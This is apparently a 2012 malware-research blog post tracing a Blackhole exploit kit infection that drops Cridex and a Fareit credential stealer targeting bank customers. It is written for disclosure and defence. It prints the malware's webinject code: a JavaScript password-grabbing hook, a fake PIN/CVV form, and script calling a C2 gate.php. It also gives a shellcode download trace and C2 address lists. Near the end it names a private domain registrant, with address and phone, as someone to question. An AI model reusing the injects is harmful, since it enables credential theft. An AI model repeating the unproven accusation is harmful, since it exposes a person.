https://chaseonline.chase.com
:
(and so many more of this..)
↑following the domain is path of credentials.. Defining domains of other bankig/cash online sites:
business\.swedbank\.lv
myonline\.bankbv\.com
banknet\.lv
bankofcyprus\.com
bankonline\.sboff\.com
bankonline\.umpquabank\.com
bmoharrisprivatebankingonline\.com
:
:
(have about 10more of these...)
↑following by path of credentials.. Or also other sites with credentials....
https://.+/(wcmfd/wcmpw|phcp/servlet)/
https://.+/pub/html/
https://direct.53.com
:
There is also javascript command to encrypt the credentials, before sent to theese moronz, see below:
 if(typeof window.EncryptPassword=='function')
{
var fn=window.EncryptPassword;
window.EncryptPassword=function(id)
{
try
{
var e=document.getElementById(id);
var i=document.createElement("input");
i.type="hidden";
i.name="OPN";
i.value=e.value;
document.Form1.appendChild(i);
}
catch(e)
{
}
return fn(id);
};
}
Not only those above, these moronz also faking online banking page to directly fooled you & phish your account credentials too, PoC:
<td class="inputField1" align="right">
ATM or Debit Card PIN:
</td>
<td class="initialtext" style="padding:4px;" >
<input type="password" class="myinputs" id="acpin" maxlength="12" size="3" name="acpin" />
</td>
</tr>
<tr>
<td class="inputField1" align="right">
3- or 4-digits security code:
</td>
<td class="initialtext" style="padding:4px;" >
<input type="password" class="myinputs" id="cvv" maxlength="4" size="3" name="cvv2" />
</td>
</tr>
<tr>
<td colspan="2">
<p class="graytext">
Please be patient as we process your information.</p>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
</td>
<td>
<!-- BEGIN art_SA_edu_edu_instr.xml -->
<span class="bodytext">
Click "Next" to continue Identity verification process.
</span>
<!-- END of art_SA_edu_edu_instr in DCTM ECP -->
</td>
</tr>
<tr>
<td colspan="2">
</td>
</tr>
<tr>
<td>
</td>
<td>
<span class="bodytext">
<label title="Go to Enter Card">
</label>
</span>
</td>
</tr>
<tr>
:
etc etc
Also making your PC as botnet. i.e.: there goes my poor test PC info - which was sent to CnC as Bot....
<modify><pattern>
<![CDATA[</html.*?>(.*?)]]></pattern><replacement>
<![CDATA[<script type="text/javascript"
src="h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase"></script>]]><
/replacement></modify></actions></httpinject>
<httpinject><conditions><url type="deny">\.(css|js)($|\?)</url>
<url type="allow" contentType="^text/(html|plain)">
so, practically your infected PC (like- my test machine, was mentioned as Bot in CnC...) The sent URL format for phishs data are plain text at:
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
Indicatingthe CnC data collector in the proxy of
78.159.121.128:8080
via below path/uri
h00p://78.159.121.128:8080/career/ h00p://78.159.121.128:8080/ipckg/gate.php
Gentlemen, Blake tested these path, and I did it too, match to ALL previous latest findings we made. No changes so far. Better to shutdown the 78.159.121.128 soon, which will slowing their movement in infections. And.. Maybe you will find additional other shocky or useful facts? Please share! :-)

Virus Total Detection Ratio

The Payload is... (Wanna bet? Lower than 5 or less?) Here:
SHA1: 0f129c1e331c3cf08eec5461a3e1d54e7f40932a MD5: 06c032711f0cfae2c443b3926253b296 File size: 117.5 KB ( 120320 bytes ) File name: test89237201835362.bin File type: Win32 EXE DetectionRatio: 5 / 46 Analysis date: 2012-12-14 21:10:08 UTC ( 1 時間, 15 分 ago ) URL ---------->>[CLICK]With Interesting Malware Names: TrendMicro-HouseCall : PAK_Generic.001 Sophos : Mal/Zbot-IQ TrendMicro : PAK_Generic.001 Kaspersky : Trojan.Win32.Bublik.wcz Panda : Trj/Genetic.gen
While the landing page is...
(I cannot upload it to VT somehow...

What's the moral of this story?

Firstly, please grep whether your banks are in the list of target list. (Again) See the pastebin here to search-->>[PASTEBIN]Now you maybe understand why we always tweet about this group? Can you imagine how frustrated we are to report this case for 4 month w/o- being followed properly by authority? <==PoC: Spams of these still spotted! This moronz team is sending hundreds spam daily with 50more redirectors & ending up to multi IP address (3 or 4) landing page with PluginDetect BHEK2 payloads of these...

Sample Download

Sorry friends, this time only sample -->>[CLICK]

Some Network Information

Domain: aviaonlolsio.ru
serial  = 2012010101
refresh = 604800 (7 days)
retry = 1800 (30 mins)
expire = 1800 (30 mins)
default TTL = 60 (1 min)

aviaonlolsio.ru. 56 IN A 217.112.40.69
aviaonlolsio.ru. 56 IN A 91.142.208.144

ns1.aviaonlolsio.ru. 59 IN A 69.64.89.82
ns2.aviaonlolsio.ru. 3600 IN A 62.76.189.72 85.143.166.202
ns3.aviaonlolsio.ru. 3600 IN A 41.168.5.140
ns4.aviaonlolsio.ru. 3600 IN A 209.51.221.247
ns5.aviaonlolsio.ru. 3600 IN A 42.121.116.38
ns6.aviaonlolsio.ru. 3600 IN A 110.164.58.250
ns7.aviaonlolsio.ru. 60 IN A 209.51.221.247
ns8.aviaonlolsio.ru. 60 IN A 163.10.12.83
ns9.aviaonlolsio.ru. 60 IN A 216.99.149.226
ns10.aviaonlolsio.ru. 60 IN A 208.87.243.196
ns11.aviaonlolsio.ru. 60 IN A 203.146.208.180
ns12.aviaonlolsio.ru. 60 IN A 74.117.61.66

registrar: NAUNET-REG-RIPN
created: 2012.12.07
paid-till: 2013.12.07
free-date: 2014.01.07
source: TCI
Last updated on 2012.12.15 05:51:35 MSK

// IP Infector history:
pelamutrika.ru A 91.142.208.144
aliamognoa.ru A 91.142.208.144
ahiontota.ru A 91.142.208.144
anifkailood.ru A 91.142.208.144
podarunoki.ru A 91.142.208.144
aseniakrol.ru A 91.142.208.144
publicatorian.ru A 91.142.208.144
pitoniamason.ru A 91.142.208.144
amnaosogo.ru A 91.142.208.144
aviaonlolsio.ru A 91.142.208.144
dimarikanko.ru A 91.142.208.144
adanagenro.ru A 91.142.208.144
awoeionfpop.ru A 91.142.208.144
aofngppahgor.ru A 91.142.208.144

pelamutrika.ru A 217.112.40.69
aliamognoa.ru A 217.112.40.69
podarunoki.ru A 217.112.40.69
aseniakrol.ru A 217.112.40.69
pitoniamason.ru A 217.112.40.69
aviaonlolsio.ru A 217.112.40.69
adanagenro.ru A 217.112.40.69
aofngppahgor.ru A 217.112.40.69

"MalwareMustDie!

Getting more "Personal" & Deeper into Cridex with Parfeit Credential Stealer Infection

$
0
0

I was posting this findings scattered in twitters, VirusTotal, KernelMode (thank's -
to @Xylit0l for the invitation), so is time to make it together..
And I'm advising you to make documentation is 1,000 times more important,
it sucks, time consuming, yet a perfect strategy to fight these moronz.

Started from a spam lead to redirector page, lead usto Blackhole(v2.01) landing page,
below is the sites:

//Redirector: 
h00p://abyssinianflights.com/components/com_ag_google_analytics2/alert-service-citi-sign_in.html
BHEK Landing Page:
h00p://eaglepointecondo.biz/detects/operation_alert_login.php
Here's the pastes of above data: Redirector-->>[PASTEBIN], LandingPage-->>[PASTEBIN], PulginDetectBHEK2-->>[PASTEBIN] The landing page was having 302 protector for bad parameters:
HTTP request sent, awaiting response... 302 Found
Location: h00p://citibank.com [following]
--20:24:05-- h00p://citibank.com/
=> `index.html'
Resolving citibank.com... 192.193.103.222, 192.193.219.58
Connecting to citibank.com|192.193.103.222|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: h00ps://online.citibank.com/US/Welcome.c [following]
h00ps://online.citibank.com/US/Welcome.c: Unsupported scheme.
I went straight wacking the shellcode, by recoding it into:
var a = "8282!%5185!%64c4!%44e0!%0551!%e004!%9134!...(copy-paste those moronz -
code here friends)..%1414!%".split("").reverse().join("");
x = a["replace"](/\%!/g, "%" + "u")
document.write(x);
This will burp you the shellcode... result is as below in bins..
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 fe fd 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
: : :
4d 4b 5c 5b 07 47 58 4d 5a 49 5c 41 47 46 77 49 MK\[.GXMZI\AGFwI
44 4d 5a 5c 77 44 47 4f 41 46 06 58 40 58 17 47 DMZ\wDGOAF.X@X.G
4e 15 1b 18 12 19 46 12 19 41 12 19 41 12 1b 1b N.....F..A..A...
0e 51 4d 15 19 45 12 19 4f 12 19 4e 12 19 42 12 .QM..E..O..N..B.
19 45 12 19 43 12 1b 18 12 19 43 12 1b 1b 12 19 .E..C.....C.....
47 0e 4f 15 19 43 0e 40 50 15 44 0e 46 4c 15 58 G.O..C.@P.D.FL.X
28 28 ((
Use your shellcode cracker tools or emulator libs to dis-assembly API:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
We'll get the payload download url below:
h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p
I like to see what server side of BHEK replied during download:
//my header
GET /detects/operation_alert_login.php?of=30:1n:1i:1i:33&%20ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p HTTP/1.1
Referer: h00p://eaglepointecondo.biz/detects/operation_alert_login.php
User-Agent: MalwareMustDie painted logo in your EK doors
Accept: */*
Host: eaglepointecondo.biz
Connection: Keep-Alive
//replies:
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Dec 2012 11:01:05 GMT
Content-Type: application/x-msdownload
Content-Length: 135168
Connection: close
X-Powered-By: PHP/5.3.14
Pragma: public
Expires: Sat, 15 Dec 2012 11:01:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Here's what the mess looks like: I was tired so I tried to check it in some online tools, got no satisfactory result thus VirusTotal looks having problem uploading... so I used my last energy to check it myself, as per below video: This time I'll leave the binary analysis to you, you can use - my previous post as guidance, PS: the binaries are all encrypted, de-encrypt - them will be a good idea! (I will add the binary analysis later on..) I go straight to the behavior test below, to capture & expose this infection: The cridex trojan, if is executed it will be like this: This program will self-copied/drops itself to:
%AppData% KB000777165.exe //which is actually the same file...
With the copy API below:
CopyFileW(lpExistingFileName: "C:\TEST\info.exe", 
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe",
bFailIfExists: 0x0)
Here's the proof: A self execution trace with below API(CMD) found:
lpCmdLine=C:\Documents and Settings\User\Application Data\KB00085031.exe, uCmdShow=0
It runs like this: Found interesting strings in that binary: At this point we captured the huge binary saved after HTTP/POST sent:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 74.207.237.170:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
DP.....O@xt,U..V|............c1..4~:
R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
.....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
.......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
u..2.~@

// With the encryption reply long binary data...
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 09:58:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
f3b
.}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
2U...`......p_| ]X.$...B..A.F....}.snip
.@C...4*j..|.\..%..xv-.....snip
.1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
[.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
:
:snip
:
.%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
.<p....N....,..v......R...d..U_...?....k...-.....E%.snip
...a.AZ$......H...7r......
And then found the below file was created in the %Temp%
FileName: exp2.tmp.exe
TimeStamp: 2012/12/15 18:58 122,880
MD5 ce7474646297ed818bb8ed48f50c7e1e
The file looks like this: And THEN...the new process of exp2.tmp.exe started: Up to this point we know that KB00085031.exe downloads exp2.tmp.exe. Currently, in the registry was only one key was added. Is an autostart- for the KB00085031.exe :
HKU\S-1-5-21-1214440339-926492609-1644491937-1003
\Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe:
""C:\Documents and Settings\%%UserName\Application Data\KB00777165.exe""

Network activity

At this points, exp2.tmp.exe was making a hell of connection, I recorded in wireshark as per summary below, full data is here --->>[PASTEBIN]
(323): try to connect to 132.248.49.112
(335): DNS requests to...
112.49.248.132.in-addr.arpa web.ecologia.unam.mx
77.65.130.113.in-addr.arpa ns.shinbiro.com..domain
(360): Communicating via HTTP/POST to 203.113.98.131:80
(385): ***** At this point the malware process exp2.tmp.exe was started....
(394): try to establish conn to 74.207.237.170
(399): send ping to 209.190.61.50
(405): Communicating via HTTP/POST to 174.143.174.136:8080
(461): try to establish conn to 199.71.215.194
(467): Communicating via HTTP/POST to 210.56.23.100:8080
(495): try to establish conn to 132.248.49.112
(500): try to establish conn to 74.117.61.66
(535): try to establish conn to 173.192.229.36
(541): Communicating via HTTP/POST to 69.64.89.82:8080
(571): try to establish conn to: 173.224.221.135
(577): try to estacblish conn to: 59.90.221.6
(583): try to establish to 180.235.150.72
(588): Communicating via HTTP/POST to 123.49.61.59:8080
(641): Communicating via HTTP/POST to 123.49.61.59:8080
(716): try to establish conn to 113.130.65.77
(721): try to establish conn to 180.235.150.72
(726): Communicating via HTTP/POST to 69.64.89.82:8080
Mr. EP_X0FF the Global Moderator of KernelInfo was cracking the code to find the all connection possibilitty as below:
hxxp://123.49.61.59:8080
hxxp://180.235.150.72:8080
hxxp://59.90.221.6:8080
hxxp://173.224.221.135:8080
hxxp://210.56.23.100:8080
hxxp://199.71.215.194:8080
hxxp://74.117.61.66:8080
hxxp://209.51.221.247:8080
hxxp://174.143.174.136:8080
hxxp://74.207.237.170:8080
hxxp://203.217.147.52:8080
hxxp://208.87.243.18:8080
hxxp://206.176.226.157:8080
With the below list of callbacks:
hxxp://132.248.49.112:8080/asp/intro.php         
hxxp://113.130.65.77:8080/asp/intro.php
hxxp://203.113.98.131:8080/asp/intro.php
hxxp://110.164.58.250:8080/asp/intro.php
hxxp://200.108.18.158:8080/asp/intro.php
hxxp://207.182.144.115:8080/asp/intro.php
hxxp://148.208.216.70:8080/asp/intro.php
hxxp://203.172.252.26:8080/asp/intro.php
hxxp://202.6.120.103:8080/asp/intro.php
hxxp://203.146.208.180:8080/asp/intro.php
hxxp://207.126.57.208:8080/asp/intro.php
hxxp://203.80.16.81:8080/asp/intro.php
hxxp://202.180.221.186:8080/asp/intro.php

File activity

The exp2.tmp.exe at the first runs making your PC so slow, because it search every path possible for the data to steal, VirusTotal is making good behavior file access list here-->>[PASTEBIN]Snipped here:
\\.\PIPE\lsarpc (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed)
C:\WINDOWS\wcx_ftp.ini (failed)
C:\Documents and Settings\\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)

The Password Stealer Configurator

At this point in your registry at the below key:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\SD5809E24(←random)\:
Was saved a long strings like this:
3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 39 34 38 62 33 33 30 31 35 38 63 61 66 64 39 37 36 31 39 64 39 38 35 31 39 66 39 66 64 38 61 66 61 64 39 34 62 37 64 38 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 5C 2E 28 63 73 73 7C 6A 73 29 28 24 7C 5C 3F 29 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 5C 2E 63 6F 6D 2F 6B 31 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 63 68 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 2F 7A 62 66   
   :
6F 64 79 2E 2A 3F 3E 28 2E 2A 3F 29 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 3A 2F 2F 37 38 2E 31 35 39 2E 31 32 31 2E 31 32 38 3A 38 30 38 30 2F 69 70 63 6B 67 2F 67 61 74 65 2E 70 68 70 3F 62 6F 74 69 64 3D 52 49 4B 2D 31 33 37 39 43 46 33 37 43 32 35 5F 39 34 35 35 45 35 30 44 30 42 32 44 32 30 43 42 26 62 61 6E 6B 3D 62 61 6E 6B 6F 66 61 6D 65 72 69 63 61 22 3E 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E
Save that↑as binary with the TXT filename & you'll see this malware config in text, you'll see the bank/case online sites with each connection with the credential path also some public https or ftp online. I saved the data in here-->>[PASTEBIN] Thank's again to Mr. EP_X0FF the Global Moderator of KernelInfo who mentioned all of the software & path of credentials seeked here-->>[PASTEBIN]I counted 491 type of credentials was seeked.. Back to the this stealer configuration file, it has encryption before sent by POST method:

if(typeof window.EncryptPassword=='function')
{var fn=window.EncryptPassword;window.EncryptPassword=function(id)
{
try{var e=document.getElementById(id);
var i=document.createElement("input");
i.type="hidden";
i.name="OPN";
i.value=e.value;
document.Form1.appendChild(i);}
catch(e){}return fn(id);};}
There is also phishing for the credit card/online banking trap, the code is in stealer configuration, something like this snips:

:
<span class="bodytext">
Click "Next" to complete Identity verification process.
</span>
<!-- END of art_SA_edu_edu_instr in DCTM ECP -->
</td>
</tr>
<tr>
<td colspan="2">
</td>
</tr>
<tr>
<td>
</td>
<td>
<span class="bodytext">
<label title="Go to Enter Card">

</label>
</span>
</td>
</tr>
<tr>
<td colspan="2">
</td>
:
I just save the configuration data into html & run it as PoC, saved it as this teststealer.html: See the path & filename well..Then here we go... Hello American Express! Good Day Chase Bank! In what I confimred in configuration code, it sends stolen credential into:
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=chase
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=wellsfargo
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=bankofamerica

Virus Total Detection Ratio

It's been 24hrs more since I detected these messes, after 1st disclosure in- here and there let's see the detection ratio of these infectors below: The landing page:
SHA1: 35d9f1481132d8f1abdc1b2d3aa56cd1455f6656 MD5: a93bb29d6a3c3c04b1cb3dafc7cfc79f File size: 90.1 KB ( 92310 bytes ) File name: operation_alert_login.php File type: HTML Detection ratio:6 / 46 Analysis date: 2012-12-16 06:22:39 UTC ( 1 分 ago ) URL -->>[CLICK]MalwareName: McAfee-GW-Edition : JS/Exploit-Blacole.gq NANO-Antivirus : Trojan.Script.Expack.bcrxpa McAfee : JS/Exploit-Blacole.gq Fortinet : JS/Obfuscus.AACB!tr TheHacker : JS/Feebs.gen@MM AVG : JS/Redir
The Cridex trojan of password stealer downloader:
SHA1: d4bfbbd375da0ac775812bed2459ff908e1fb9ba MD5: b360fec7652688dc9215fd366530d40c File size: 132.0 KB ( 135168 bytes ) File name: info.exe File type: Win32 EXE Tags: peexe Detection ratio: 26 / 45 Analysis date: 2012-12-16 01:28:28 UTC ( 5 時間, 5 分 ago ) URL -->>[CLICK]MalwareName: MicroWorld-eScan : Trojan.Generic.KD.810285 McAfee : pws-ja!cm Malwarebytes : Trojan.FakeMS Symantec : W32.Cridex Norman : W32/Suspicious_Gen4.BTZMQ ESET-NOD32 : a variant of Win32/Kryptik.AQNJ TrendMicro-HouseCall : TROJ_GEN.RCBCDLE Avast : Win32:Dropper-MEA [Drp] Kaspersky : Trojan.Win32.Bublik.wad BitDefender : Trojan.Generic.KD.810285 Emsisoft : Trojan.Win32.Agent.AMN (A) Comodo : TrojWare.Win32.Trojan.Agent.Gen F-Secure : Trojan.Generic.KD.810285 DrWeb : Trojan.Necurs.97 VIPRE : Win32.Malware!Drop AntiVir : TR/Bublik.wad McAfee-GW-Edition : pws-ja!cm Sophos : Troj/Agent-ZIT Microsoft : Worm:Win32/Cridex.E ViRobot : Trojan.Win32.A.Bublik.135168.S GData : Trojan.Generic.KD.810285 PCTools : Malware.Cridex Ikarus : Trojan-Spy.Agent Fortinet : W32/Bublik.WAD!tr AVG : Generic30.BIMO Panda : Trj/Sinowal.WWG
The password stealer (fareit) trojan:
SHA1: 88bab6d7c0e98b1ee55110243251f562af399854 MD5: ce7474646297ed818bb8ed48f50c7e1e File size: 120.0 KB ( 122880 bytes ) File name: exp2.tmp.ex_ File type: Win32 EXE Tags: peexe Detection ratio: 7 / 46 Analysis date: 2012-12-16 01:13:52 UTC ( 5 時間, 6 分 ago ) URL -->>[CLICK]MalwareName: DrWeb : Trojan.PWS.Stealer.1656 VIPRE : Trojan.Win32.Kryptik.alry (v) Emsisoft : Trojan.PSW.Win32.Tepfer.dazd.AMN (A) Kaspersky : Trojan-PSW.Win32.Tepfer.dazd Malwarebytes : Trojan.PWS Kingsoft : Win32.Malware.Generic.a.(kcloud) ViRobot : Trojan.Win32.A.PSW-Tepfer.122880.A
We can see that the landing page & password stealer (parfeit) STILL has low detection.

Samples

For the good guys, the samples & captures data avilable. Samples --->>[HERE]Research Data(PCAP, RegShot) -->>[HERE]Cracked Data (deobfs'ed code, decrypt binaries(thanks to kernelmode!)etc) -->>[HERE]

Thank's to...

To all MalwareMustDie friends! Without you guys, I won't do this far :-) Blake (jsunpack, for inspiring the stealer configuration file. @Xylit0l & EP_X0FF of kernelmode, great thank's! YouTube, VirusTotal, MediaFire, Google & Blogger

Network Analysis..Tracing the Bad guys..

As per requested, I investigated the NS used, leads to someone.. Please bear my text since I posted via FreeBSD below:
//The domain used for the infector is 
eaglepointecondo.biz 900 IN A 59.57.247.185
// ↑This is aiming US for sure (see the bank list, 75% are US banks)

// The SOA that was used (mark the TTL refresh time..)
primary name server = ns1.amishshoppe.net
responsible mail addr = (root)
serial = 1355645102
refresh = 60 (1 min)
retry = 120 (2 mins)
expire = 1048576 (12 days 3 hours 16 mins 16 secs)
default TTL = 900 (15 mins) //←this!

//How it was root'ed:
Tracing to eaglepointecondo.biz[a] via 202.238.95.24, maximum of 1 retries
202.238.95.24 (202.238.95.24)
|\___ a.gtld.biz [biz] (156.154.124.65)
| |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
| \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
|\___ k.gtld.biz [biz] (156.154.128.65)
| |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
| \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
|\___ f.gtld.biz [biz] (209.173.58.66)
| |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
| \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
|\___ c.gtld.biz [biz] (156.154.127.65)
| |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
| \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
|\___ b.gtld.biz [biz] (156.154.125.65)
| |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
| \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
\___ e.gtld.biz [biz] (156.154.126.65)
|\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *

//History of infector from 59.57.247.185 leaeds to:
eaglepointecondo.org A 59.57.247.185
pleansantwille.com A 59.57.247.185
eaglepointecondo.co A 59.57.247.185
platinumbristol.net A 59.57.247.185
eaglepointecondo.biz A 59.57.247.185
sessionid0147239047829578349578239077.pl A 59.57.247.185

//It uses Chinese IP:
ASN |Prefix | ASName |CN |Domain |ISP of an IP Address
4134 | 59.56.0.0/14 | CHINANET | CN | XMJL.COM | XIAMEN JINLONGLVXINGCHE FUJIAN PROVINCE

//PoC of this IP infection as additional evidence:
http://urlquery.net/search.php?q=59.57.247.185&type=string&start=2012-12-01&end=2012-12-16&max=300

// These moronz is using the DNS below:
ns1.amishshoppe.net. 3600 IN A 209.140.18.37
ns2.amishshoppe.net. 3600 IN A 211.27.42.138

// Those DNS Server are in US & Australia (should report this malicious use..)
ASN |Prefix | ASName | CN | Domain | ISP of an IP Address
11042 | 209.140.16.0/22 | LANDIS-HOLDINGS-INC | US | NOCDIRECT.COM | LANDIS HOLDINGS INC
9443 | 211.27.32.0/20 | INTERNETPRIMUS-AS | AU | PRIMUSTEL.COM | PRIMUS TELECOMMUNICATIONS

//Looks they should got full control on domain amishshoppe.net to control DNS:
PoC:
; > DiG 9.8.1-P1 > 209.140.18.37 axfr // Voila! no AXFR allowed means NS ust be added directly.
;; global options: +cmd
; Transfer failed.
; > DiG 9.8.1-P1 > 211.27.42.138 axfr
;; global options: +cmd
; Transfer failed.

//This infector in WHOIS:
Domain Name: EAGLEPOINTECONDO.BIZ
Domain ID: D52418387-BIZ
Sponsoring Registrar: GODADDY.COM, INC.
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Created by Registrar: GODADDY.COM, INC.
Last Updated by Registrar: GODADDY.COM, INC.
Domain Registration Date: Sat Dec 08 00:22:13 GMT 2012
Domain Expiration Date: Sat Dec 07 23:59:59 GMT 2013
Domain Last Updated Date: Mon Dec 10 19:12:41 GMT 2012

//VIA Strange proxy services....
Registrant Organization: Domains By Proxy, LLC
Registrant Address1: DomainsByProxy.com
Registrant Address2: 14747 N Northsight Blvd Suite 111, PMB 309
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.4806242599
Registrant Facsimile Number: +1.4806242598

// some must start questioning Mr. Steve Burandt in US about this infection...
Domain Name: AMISHSHOPPE.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Status: clientTransferProhibited
Updated Date: 15-nov-2012 // Creation Date: 15-nov-2012
Expiration Date: 15-nov-2013

Registrant:
Steve Burandt
0n430 Peter Rd
Winfield, IL 60190
US
Phone: +1.6304626711
Email: solaradvent@yahoo.com
